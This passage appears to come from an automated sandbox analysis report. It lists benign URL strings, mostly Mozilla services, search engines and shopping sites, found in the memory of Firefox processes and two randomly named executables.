Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2891825991.000001DEF7090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967932562.000001D14F003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E7F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsresource://gre/modules/TelemetryTimestamps.sys.mjs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001C.00000003.2824146264.000001DEF14A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translationFTP
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BDF000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601644924.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2602125787.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601840702.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BDF000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601644924.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2602125787.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601840702.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://browser/content/parent/ext-devtools-pane
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2754238638.000001DEF7094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/Trying
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
